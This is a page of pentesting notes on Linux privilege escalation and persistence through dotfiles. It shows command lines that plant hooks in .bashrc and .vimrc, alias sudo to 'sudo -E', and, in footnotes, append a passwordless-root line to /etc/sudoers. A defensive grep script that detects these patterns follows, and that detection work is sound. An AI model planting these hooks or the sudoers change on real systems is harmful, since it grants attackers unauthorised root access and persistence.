# Linux

{% embed url="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" %}

## dotfiles .xxx

{% hint style="info" %}
Applications frequently store user-specific configuration files and subdirectories within a user's home directory, typically only writable by the user themselves or *root*.
{% endhint %}

### /bin/bash

`.bash_profile` is executed when logging in to the system initially. This happens when logging in to the machine itself, via a serial console or SSH.

`.bashrc` is executed when a new terminal window is opened from an existing login session or when a new shell instance is started from an existing login session.

We can modify `.bash_profile` or `.bashrc` to set environment variables or load scripts when a user initially logs in to a system. This can be useful for maintaining persistence and escalating privileges, e.g. `echo "touch /tmp/bashtest.txt" >> ~/.bashrc`

### VIM

#### Unrestricted VIM environment -

{% code title="a) ! can exec shell cmd" %}

```bash
echo "!touch /tmp/test.txt" >> ~/.vimrc
```

{% endcode %}

<pre class="language-bash" data-title="b) stealthier"><code class="lang-bash"><strong>echo "#!/bin/bash" >> ~/.vimrunscript
</strong><strong>echo '<a data-footnote-ref href="#user-content-fn-1">echo "hacked" > /tmp/hacksrcout.txt</a>' >> ~/.vimrunscript
</strong><strong>
</strong><strong>echo ":silent !source ~/.vimrunscript" >> ~/.vimrc
</strong></code></pre>

```bash
sudo vi
```

{% hint style="warning" %}
VIM handles its configuration files differently for a user in a sudo context depending on the distribution of Linux.

On *Ubuntu* and *Red Hat*, VIM uses the current user's `.vimrc` configuration file even in a sudo context. <mark style="background-color:green;">**(If the user runs VIM via `sudo`, our script being sourced will also run as *root*.)**</mark>

On other distributions, such as *Debian*, VIM in a sudo context uses the *root* user's VIM configuration. <mark style="background-color:green;">**We can add an *alias* to the user's `.bashrc` file, as shown below.**</mark>
{% endhint %}

#### In *Debian*

The `alias` replaces a standard `sudo` call with one that forces `sudo` to persist the user's VIM settings, so that the shell script being loaded also runs as *root* when the user runs VIM via `sudo`.

```bash
echo 'alias sudo="sudo -E"' >> ~/.bashrc
```

{% code title="apply the change" %}

```bash
source ~/.bashrc
```

{% endcode %}

{% hint style="info" %}
If `sudo -l` shows `NOPASSWD` on a vim command that opens a specific file, we can just run `sudo vi the_file` and use `:shell` directly to gain a root shell without the root password.
{% endhint %}

{% hint style="info" %}
Note that many administrators now require the use of *sudoedit* for modifying sensitive files. This process makes copies of the files for the user to edit and then uses sudo to overwrite the old files. It also prevents the editor itself from running as sudo. Having said this, it is also not uncommon to find that system administrators simply add VIM to the allowed commands in the sudoers file instead.
{% endhint %}

#### Restricted VIM environment that blocks shell command -

<pre class="language-vim" data-title="~/.vim/plugin/settings.vim"><code class="lang-vim">:if $USER == "root"
:autocmd BufWritePost * :silent <a data-footnote-ref href="#user-content-fn-2">:w! >> /tmp/hackedfromvim.txt</a>
:endif
</code></pre>
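
To check a home directory for the changes described on this page (a `sudo` alias in `.bashrc` or `.bash_profile`, shell-executing lines in `.vimrc`, and `autocmd` hooks under `~/.vim/plugin`), the following added example greps for each pattern. It is not part of the original notes; the function names, reason tags and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag the dotfile changes described
# above in one home directory. Output format: file:line:reason:text

# scan FILE REASON ERE -> print every line of FILE matching ERE, tagged with REASON
scan() {
    [ -f "$1" ] || return 0
    grep -nE -- "$3" "$1" | while IFS= read -r hit; do
        printf '%s:%s:%s:%s\n' "$1" "${hit%%:*}" "$2" "${hit#*:}"
    done
}

# audit_dotfiles HOME_DIR -> print findings; exit status 1 if there are any
audit_dotfiles() {
    home=$1
    findings=$(
        # Shell startup files: an alias that shadows sudo (e.g. to add -E)
        for f in "$home/.bashrc" "$home/.bash_profile"; do
            scan "$f" sudo-alias '^[[:space:]]*alias[[:space:]]+sudo='
        done
        # Vim startup files: the user's vimrc plus every plugin script
        for f in "$home/.vimrc" "$home"/.vim/plugin/*.vim; do
            # Ex command that shells out: "!cmd" or ":silent !cmd"
            scan "$f" vim-shell-exec '^[[:space:]]*:?(sil(ent)?!?[[:space:]]+)?!'
            # autocmd that appends the buffer elsewhere (":w! >> file") or shells out
            scan "$f" vim-autocmd \
                '^[[:space:]]*:?au(tocmd)?[[:space:]].*(:w!?[[:space:]]*>>|[[:space:]]:?!)'
        done
    )
    if [ -z "$findings" ]; then return 0; fi
    printf '%s\n' "$findings"
    return 1
}

# make_sample -> build a constructed home directory holding the page's three patterns
make_sample() {
    d=$(mktemp -d) && mkdir -p "$d/.vim/plugin" || return 1
    printf '%s\n' 'export EDITOR=vim' 'alias sudo="sudo -E"' > "$d/.bashrc"
    printf '%s\n' 'set number' ':silent !source ~/.vimrunscript' > "$d/.vimrc"
    printf '%s\n' ':if $USER == "root"' \
        ':autocmd BufWritePost * :silent :w! >> /tmp/hackedfromvim.txt' ':endif' \
        > "$d/.vim/plugin/settings.vim"
    printf '%s\n' "$d"
}
# Demo: audit_dotfiles "$(make_sample)"
```

Comparing each user's dotfiles against a known-good baseline catches changes these patterns miss, such as an arbitrary command appended to `.bashrc`.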

[^1]: `echo "`*`user`*` ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers`

[^2]: to run shell script/commands, prepend with ! mark -

    `!script1` / `!id`

    `!echo "`*`user`*` ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers`
